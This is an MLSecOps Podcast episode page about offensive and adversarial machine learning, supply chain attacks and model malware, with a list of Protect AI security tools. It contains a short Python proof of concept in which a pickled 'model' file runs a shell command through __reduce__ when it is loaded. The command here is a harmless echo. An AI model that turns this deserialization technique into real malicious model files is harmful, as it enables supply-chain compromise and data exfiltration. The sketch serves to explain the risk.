Practical Offensive and Adversarial ML for Red Teams

Send us a text

Next on the MLSecOps Podcast, we have the honor of highlighting MLSecOps Community member and Dropbox™ red teamer Adrian Wood.
Adrian joined Protect AI threat researchers Dan McInerney and Marcello Salvati in the studio to share an array of insights, including what inspired him to create the Offensive ML (aka OffSec ML) Playbook, and to dive into categories such as adversarial machine learning (ML), offensive and defensive ML, and supply chain attacks.

The group also discusses dual uses for "traditional" ML and LLMs in security, the rise of agentic LLMs, and the potential for crown-jewel data leakage via model malware (i.e., highly valuable and sensitive data being exfiltrated from an organization by malicious code embedded within machine learning models or AI systems).
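
For readers unfamiliar with the mechanism behind model malware, here is a minimal, illustrative sketch (not from the episode) of why loading an untrusted model file can execute attacker code: pickle-based model formats run arbitrary code during deserialization, so a "model" file can carry an embedded payload.

```python
# Illustrative sketch only (not from the episode): pickle-based model files
# execute code during deserialization, which is the classic vector for
# embedding malware inside an ML model artifact.
import pickle


class MaliciousPayload:
    # __reduce__ tells pickle how to rebuild the object; returning a callable
    # plus its arguments means that callable runs when the file is loaded.
    def __reduce__(self):
        import os
        # Hypothetical, benign stand-in command; a real payload could read
        # and exfiltrate "crown jewel" data instead of echoing a message.
        return (os.system, ("echo payload executed on model load",))


# The attacker serializes the payload so it looks like an ordinary model file...
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# ...and the victim merely loading that "model" triggers the embedded command.
with open("model.pkl", "rb") as f:
    pickle.load(f)
```

This is the kind of supply-chain risk that model-scanning approaches, such as the Protect AI Guardian tool listed below, aim to mitigate by inspecting model artifacts before they are loaded.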

Thanks for checking out the MLSecOps Podcast! Get involved with the MLSecOps Community and find more resources at https://community.mlsecops.com.
Additional tools and resources to check out:
Protect AI Guardian: Zero Trust for ML Models

Recon: Automated Red Teaming for GenAI

Protect AI’s ML Security-Focused Open Source Tools

LLM Guard Open Source Security Toolkit for LLM Interactions

Huntr - The World's First AI/Machine Learning Bug Bounty Platform
